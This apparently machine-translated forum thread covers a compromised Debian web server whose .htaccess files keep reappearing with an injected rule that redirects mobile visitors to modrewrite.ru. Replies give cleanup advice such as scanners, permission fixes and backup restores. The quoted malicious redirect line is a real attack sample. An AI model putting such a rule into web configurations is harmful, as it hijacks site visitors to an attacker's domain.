Filled in, changed .htaccess and redirected all mobile traffic. How to remove?

Debian GNU/Linux 6.0
In all directories and subdirectories with sites, an .htacess file is created with the following content:
Code:

RewriteRule ^(.*)$ http://modrewrite.ru [L,R=302]

Thus, if you open a site with such a file in the root from a mobile device, a redirect is made to the left site, as can be seen from the rewrites.
What I tried to do:
- Delete files with such content. After a while they reappear.
- If you say find /var/www/sites -name '.htaccess' -exec grep -r 'modrewrite.ru' {} \; -exec chown root:root {} \; and then overwrite such a file as root, then it does not change afterwards. The entire directory and subdirectories are owned by the username account, from which, by the way, apache also works. New files are also created with the owner username.
- Looked through all access-logs at the time of creating new htaccess'ov - nothing was found. So the infection lies on the server itself.
- Changed the password for root accounts, username. Did not help. Apparently, the service is registered in the system.
- Disabled ProFTPd - I thought it came from there. Did not help.
- I combed through the entire cron - nothing left. This means that either the malicious code is sewn into peaceful scripts, or it is not there.
- I ran grep -r 'modrewrite.ru' /, but this is a very long procedure for obvious reasons, it's been sausage for two days, there is no result yet.
I would appreciate any advice. Thank you.

Well, obviously then the code in scripts, grep on files may not help, since basically such things are not in open form. It's better to look at the latest modified and new files and bounce from them. Why are you running apache as a user? Can it run from another user and give write permissions only where necessary? I would also advise you to install some kind of versioning system (git, mercurial), then you can find changes in scripts and new files in one command. Of course, you will need to put exceptions on files where you store user content files (photos, etc.)

What do checks of the directory through maldet, chkrootkit and rkhunter say based on the results and after cleaning we update vulnerable engines or plugins.

one . you have a virus on the site. htaccess is just a consequence of it
Remove the virus and then treat .htaccess
2. There are several ways to solve the problem and all of them are difficult to describe
, I recommend that you fight the easiest option
Since the files are rarely edited, and I think you will figure it out with the main .htaccess by hand.
THEN
We restore all .htaccess files from the backup, preserving the structure
, in fact, we will copy only these files with the structure, then each to its own directory.
Go to the unpacked backup
Further, if everything is correctly unpacked, we stupidly copy it all over your site, or immediately indicate the path to the site instead of / tmp.
This will complete the treatment of the .htaccess itself and you will need to treat the virus
, type ai-bolit.php on the Internet and wish you good luck.
